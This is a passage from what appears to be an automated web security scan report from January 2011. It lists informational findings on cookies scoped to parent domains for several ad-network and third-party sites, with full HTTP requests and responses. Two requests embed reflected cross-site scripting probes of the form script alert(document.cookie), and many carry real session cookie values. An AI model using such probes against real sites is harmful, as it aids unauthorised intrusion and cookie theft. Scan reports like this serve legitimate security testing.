GET /hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/?cmd=file&file=visitorWantsToTalk&site=5296924&voiceMethod=esc HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://burp/show/9
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; HumanClickCHATKEY=3761611791040242971; LPit=false; LivePersonID=-16101423669632-1296224208:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Master; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 15:05:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickKEY=8955939450992135978; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: text/html;charset=UTF-8
Last-Modified: Fri, 28 Jan 2011 15:05:19 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 26936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">

<head>
<title>
...[SNIP]...

10.36. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=2137335&Page=&PluID=0&Pos=1348\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-14437/Type-0/7af38356-1767-4fe6-b92f-837e34fde281.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEk02WG00002h5iUabLQ07l00000Gh5j3abPm07l00000Sgn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG89PS000000000GsZ89PT000000000Ss+852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_1348\=4478147
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 05:22:54 GMT
Connection: close


10.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEl02WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Fri, 28 Jan 2011 17:37:30 GMT
Connection: close
Content-Length: 3021

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.38. http://c.chango.com/collector/tag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.chango.com
Path:   /collector/tag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collector/tag.js?_r=1296236606219&partnerId=oversee&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F&q=mass%20texting HTTP/1.1
Host: c.chango.com
Proxy-Connection: keep-alive
Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:43:35 GMT
Content-Type: text/javascript
Connection: close
Server: TornadoServer/1.1
Etag: "96e7c3afd30c151e7af6141145727255f5ec8c76"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _t=21d8e954-2b06-11e0-8e8a-0025900870d2; Domain=chango.com; expires=Mon, 25 Jan 2021 17:43:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Thu, 28 Apr 2011 17:43:35 GMT; Path=/
Content-Length: 1303

(new Image()).src = 'http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=' + encodeURIComponent('21d8e954-2b06-11e0-8e8a-0025900870d2');(new Image()).src = 'http://bid.openx.net/cm?p
...[SNIP]...

10.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 978
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=55
Expires: Fri, 28 Jan 2011 17:27:35 GMT
Date: Fri, 28 Jan 2011 17:26:40 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

10.40. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 955
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=563
Expires: Fri, 28 Jan 2011 16:54:00 GMT
Date: Fri, 28 Jan 2011 16:44:37 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

10.41. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 979
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=257
Expires: Fri, 28 Jan 2011 17:30:57 GMT
Date: Fri, 28 Jan 2011 17:26:40 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

10.42. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 956
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=562
Expires: Fri, 28 Jan 2011 16:54:00 GMT
Date: Fri, 28 Jan 2011 16:44:38 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

10.43. http://cbs6albany.oodle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cbs6albany.oodle.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: cbs6albany.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 05:24:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=4cb1554b3fac0f3130b9462891294fa6; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=9071808584648e0860c7c6ca699e90c4; path=/; domain=.oodle.com
Set-Cookie: a=dT1GNDQ0QTkwNTRENDNBNDg3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2NjM7fQ%3D%3D; path=/; domain=.oodle.com
Content-Length: 101595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...

10.44. http://cbs6albany.oodle.com/pro/fb-follow/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cbs6albany.oodle.com
Path:   /pro/fb-follow/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pro/fb-follow/?url=http%3A%2F%2Fcbs6albany.oodle.com%2F%3F2ba1c%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E0fdede783fa%3D1 HTTP/1.1
Host: cbs6albany.oodle.com
Proxy-Connection: keep-alive
Referer: http://cbs6albany.oodle.com/?2ba1c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0fdede783fa=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: otu=ce87321bc657a3f6e2854f05d3721d95; ots=6c54c2e4af9e0e7ad3ee741dc7b34b67; a=dT1DMDU2MEIyMzRENDQyM0FF; multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYzMTEyMTQ7fQ%3D%3D; cmTPSet=Y; CoreID6=18691534500812963112423; __qca=P0-987795237-1296311242367; 90184176_clogin=l=1296311242&v=1&e=1296314842664

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: no-cache, no-store
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Expires: -1
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 14:27:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYzMTEyNTM7fQ%3D%3D; path=/; domain=.oodle.com
Content-Length: 1397

{"profile_html":"<div class=\"profile-polaroid\">\n\t<div class=\"profile-polaroid-pic\">\n\t\t\t<img src=\"http:\/\/i.oodleimg.com\/a\/account\/facebook_silhouette.gif\" width=\"50\" height=\"50\"\/>
...[SNIP]...

10.45. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/1302/egc.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R52_9/jsc/1302/egc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_9/jsc/1302/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:0,0|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,0;expires=Sun, 27 Feb 2011 17:26:43 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2848445226
Cache-Control: max-age=2330250
Expires: Thu, 24 Feb 2011 16:44:13 GMT
Date: Fri, 28 Jan 2011 17:26:43 GMT
Connection: close



10.46. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/951/egc.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R52_9/jsc/951/egc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_9/jsc/951/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
